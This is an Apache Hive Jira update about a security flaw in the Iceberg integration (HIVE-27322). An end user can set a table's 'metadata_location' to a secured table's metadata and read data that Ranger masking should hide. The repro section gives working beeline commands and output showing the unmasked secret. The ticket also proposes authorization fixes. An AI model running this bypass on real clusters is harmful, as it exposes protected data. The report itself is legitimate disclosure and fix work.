[
https://issues.apache.org/jira/browse/HIVE-27322?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Janos Kovacs updated HIVE-27322:
--------------------------------
Parent: HIVE-27713
Issue Type: Sub-task (was: Bug)
> Iceberg: metadata location overrides can cause data breach - custom location
> to AuthZ
> -------------------------------------------------------------------------------------
>
> Key: HIVE-27322
> URL: https://issues.apache.org/jira/browse/HIVE-27322
> Project: Hive
> Issue Type: Sub-task
> Components: Iceberg integration
> Affects Versions: 4.0.0-alpha-2
> Reporter: Janos Kovacs
> Assignee: Ayush Saxena
> Priority: Blocker
> Labels: check, pull-request-available
> Fix For: 4.0.0
>
>
> Set to bug/blocker instead of enhancement due to its security related nature,
> Hive4 should not be released w/o fix for this. Please reset if needed.
>
> Context:
> * There are some core tables with sensitive data that users can only query
> with data masking enforced (e.g. via Ranger). Let's assume this is the
> `default.icebergsecured` table.
> * An end-user can only access the masked form of the sensitive data as
> expected...
> * The users also have privilege to create new tables in their own sandbox
> databases - let's assume this is the `default.trojanhorse` table for now.
> * The user can create a malicious table that exposes the sensitive data
> non-masked leading to a possible data breach.
> * Hive runs with doAs=false to be able to enforce FGAC and prevent end-user
> direct file-system access needs
> Repro:
> * First make sure the data is secured by the masking policy:
> {noformat}
> <kinit as privileged user>
> beeline -e "
> DROP TABLE IF EXISTS default.icebergsecured PURGE;
> CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string)
> STORED BY ICEBERG;
> INSERT INTO default.icebergsecured VALUES ('You might be allowed to see
> this.','You are NOT allowed to see this!');
> "
> <kinit as end user>
> beeline -e "
> SELECT * FROM default.icebergsecured;
> "
> +------------------------------------+--------------------------------+
> | icebergsecured.txt | icebergsecured.secret |
> +------------------------------------+--------------------------------+
> | You might be allowed to see this. | MASKED BY RANGER FOR SECURITY |
> +------------------------------------+--------------------------------+
> {noformat}
> * Now let the user to create the malicious table exposing the sensitive data:
> {noformat}
> <kinit as end user>
> SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
> beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null |grep
> metadata_location |grep -v previous_metadata_location | awk '{print $5}')
> beeline -e "
> DROP TABLE IF EXISTS default.trojanhorse;
> CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED
> BY ICEBERG
> TBLPROPERTIES (
> 'metadata_location'='${SECURED_META_LOCATION}');
> SELECT * FROM default.trojanhorse;
> "
> +------------------------------------+-----------------------------------+
> | trojanhorse.txt | trojanhorse.secret |
> +------------------------------------+-----------------------------------+
> | You might be allowed to see this. | You are not allowed to see this! |
> +------------------------------------+-----------------------------------+
> {noformat}
>
> Currently - after HIVE-26707 - the rwstorage authorization only has either
> the dummy path or the explicit path set for uri:
> {noformat}
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
>
> {noformat}
> This is can be used only to decide whether a user is allowed to create
> iceberg tables in certain databases with certain names but controlling it's
> metadata location is hard in that form:
> * it does not provide a variable of "default table location" so a rule needs
> to know the per-database table location or per-catalog warehouse location to
> be able to construct it
> * it does not provide a rich regex to filter out `/../` style directory
> references
> * but basically there should be also a flag whether explicit metadata
> location is provided or not instead of the dummy reference, which then again
> needs explicit matching in the policy to handle
>
> Proposed enhancement:
> * The URL for the iceberg table's rwstorage authorization should be changed
> the following way
> ** the <database>/<table>?<location> is good but
> *** the location should not be url encoded, or at least the authorizer
> should check the policy against the decoded url
> *** the separator between the table and location should be "/" instead of
> "?" as "?" might be mixed with its regex meaning!
> *** "/" as separator can be also confusing as the absolute paths would start
> with it. Might be that another separator character that does not conflict
> with regex, paths and table-name valid characters would be even better.
> ** the "snapshot=" seems to be non-relevant in this context, it should not
> be part of the <location>
> ** There is a need to differentiate the cases where location is only
> generated or when location is explicitly provided by end user. For this, the
> "default" location might just not be generated as path but replaced with
> "default_location" fixed value - note! it has no leading "/". That way a
> single policy definition could be used to cover all tables in their default
> locations like:
> {noformat}
> iceberg://mydatabase/*/default_location or
> iceberg://mydatabase/*/snapshot=default_location{noformat}
> *
> **
> *** "default" here means the table's default location which can depend on
> the warehouse location, the database location and the table's explicit
> location
> *** I know many developers don't like these type of hardcoded static values
> but with such a value there is no need to modify the rwstorage authorization
> (and we already using similar method for "METASTOER" type of storagehandler
> authorization)
> * The authorization request should include the rwstorage authorization only
> if the CERATE/ALTER/DROP is against the Iceberg table and not if in such
> statements the iceberg table is only a source - that might be already in fix
> via HIVE-27304
> * When any custom Iceberg metadata.json location is provided then the
> <location> must contain to provided path to be able to properly authorize it.
> * We either should not allow backstep "/../" in any locations or give an
> option to filter these out in the final authorization step.
> Like with a policy on
> {noformat}
> iceberg://mydatabase/mytable//data/use-case-1/* or
> iceberg://mydatabase/mytable/snapshot=/data/use-case-1/*{noformat}
> should not match access for
> {noformat}
> iceberg://mydatabse/mytable//data/use-case-1/../use-case-2/* or
> iceberg://mydatabse/mytable/snapshot=/data/use-case-1/../use-case-2/*{noformat}
> *
> ** Not allowing "/../" might be easier to handle on hive/impala side
> ** But "/../" might be still valid if it used within an allowed locations.
> --> users just should use proper location w/o "/../"
>
> With the above changes one single new default Ranger policy could be used to
> globally enable the creation of iceberg tables in any databases in any table
> locations but NOT using any custom metadata locations (in case if user
> doesn't want to globally turn storagehandler authorization off - via
> hive.security.authorization.tables.on.storagehandlers=false - because of
> other - hbase, kafka - handlers):
> {noformat}
> iceberg://*/*/default_location or
> iceberg://*/*/snapshot=default_location {noformat}
> Note that there is no extra "/" in front of "default_location", only the
> separator character in the first case
>
> Also with the above changes we could allow users to configure authorizations
> for custom/shared data location via:
> {noformat}
> iceberg://mydatabase/*//some/shared/table/location/* or
> iceberg://mydatabase/*/snapshot=/some/shared/table/location/* {noformat}
>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)